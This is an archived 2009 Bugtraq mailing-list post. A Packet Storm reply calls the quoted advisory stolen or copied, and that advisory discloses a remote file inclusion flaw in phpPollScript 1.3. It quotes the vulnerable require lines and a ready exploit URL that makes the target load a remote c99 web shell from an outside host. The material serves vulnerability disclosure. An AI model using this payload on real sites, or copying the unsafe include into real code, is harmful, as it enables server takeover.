[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: phpPollScript - 1.3 Remote File Include

To: admin@xxxxxxxxxx
Subject: Re: phpPollScript - 1.3 Remote File Include
From: Packet Storm <bugtraq@xxxxxxxxxxxxxxxxxxxxxxx>
Date: Mon, 21 Dec 2009 18:57:26 -0500

stolen/copied.

http://packetstormsecurity.org/0909-exploits/phppollscript-rfi.txt 
67daecae41e8707794f089bf6128efd0 phpPollScript versions 1.3 and below suffer 
from a remote file inclusion vulnerability. Authored By <a 
href="mailto:cr4wl3r[at]linuxmail.org";>cr4wl3r</a>


On Sun, Dec 20, 2009 at 11:43:25AM -0000, admin@xxxxxxxxxx wrote:
> #phpPollScript <= 1.3 Remote File Include Vulnerability
> #Download Script      :  http://download.tomex.org/phpPollScriptv13b.zip
> #Author               :  ZZxxHackerzzXX 
> #Contact              :  admin@xxxxxxxxxx
> #Location             :  Turkey
> ########################################################################
> #file :
> #  init.poll.php
> # line 2 $inc_path = dirname($include_class);
> # line 3 require ($inc_path."/voting.poll.php");
> ########################################################################
> #3xplo!t :
> #http://target.com/[path]/php/init.poll.php?include_class=http://www.ekin0x.com/c99.txt?
> ########################################################################
> #eser@xxxxxxxxxx (all crew shell)
> ########################################################################

References:
- phpPollScript - 1.3 Remote File Include
  - From: admin

Prev by Date: ClarkConnect XSS vulnerability
Next by Date: [ MDVSA-2009:337 ] proftpd
Previous by thread: phpPollScript - 1.3 Remote File Include
Next by thread: pragmaMx CMS Blind SQL/XPath Injection vulnerability
Index(es):
- Date
- Thread